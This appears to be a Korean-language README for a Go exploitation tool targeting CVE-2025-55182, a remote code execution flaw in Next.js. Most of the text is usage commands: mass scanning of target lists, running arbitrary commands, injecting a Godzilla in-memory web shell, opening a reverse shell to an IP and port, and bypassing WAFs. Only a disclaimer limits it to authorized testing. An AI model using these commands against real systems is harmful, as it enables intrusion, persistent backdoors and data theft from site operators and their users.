
CVE-2025-55182 취약점 스캔 및 활용 도구로, Next.js 애플리케이션의 원격 코드 실행 취약점을 대상으로 합니다. 배치 감지, 명령 실행, 고질라 메모리 셸 주입 및 리버스 셸 기능을 지원합니다.
⚠️ 본 도구는 보안 연구 및 승인된 테스트에만 사용해야 하며, 불법적인 용도로 사용하지 마십시오.
.txt 파일이 포함된 폴더를 지원합니다.success.json에 자동 저장하고, 선택적으로 취약점 URL을 지정된 파일로 출력합니다.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
주입에 성공하면 도구는 고질라의 연결 주소, 비밀번호, 키 및 요청 헤더 정보를 출력합니다.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: 성공적으로 활용된 모든 대상의 상세 정보를 자동 저장합니다(명령 출력, 고질라 구성 등 포함).-o로 지정된 파일: 취약점 URL 목록을 저장합니다(줄마다 하나).스캔 과정에서 진행률 표시줄과 발견된 취약점이 실시간으로 표시되며, 마지막에 통계 정보가 출력됩니다.
-p 매개변수로 프록시를 설정하세요.-to 매개변수 값을 적절히 늘리십시오.본 도구는 보안 연구 및 승인된 테스트에만 사용되며, 사용자는 모든 법적 책임을 스스로 부담해야 합니다. 개발자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다.
| 매개변수 | 유형 | 기본값 | 설명 |
|---|
-u | string | 없음 | 단일 대상 URL (예: http://example.com:3000) |
-f | string | 없음 | URL 목록이 포함된 파일 (줄마다 하나) |
-d | string | 없음 | 여러 .txt 파일이 포함된 폴더 |
-o | string | 없음 | 출력 파일 (취약점 URL 저장, 줄마다 하나) |
-t | int | 10 | 동시 스레드 수 |
-to | int | 10 | 요청 제한 시간(초) |
-c | string | 없음 | 실행할 명령 (예: id) |
-m | string | 없음 | 모드: waf (WAF 우회 활성화) |
-p | string | 없음 | HTTP 프록시 (예: http://127.0.0.1:8080) |
-g | bool | false | 고질라 메모리 셸 주입 활성화 |
-rs | string | 없음 | 리버스 셸 주소 (형식 IP:PORT) |
-dv | bool | false | 상세 모드 (각 URL의 스캔 과정 출력) |
-es | bool | false | 민감 정보 스캔 모드 |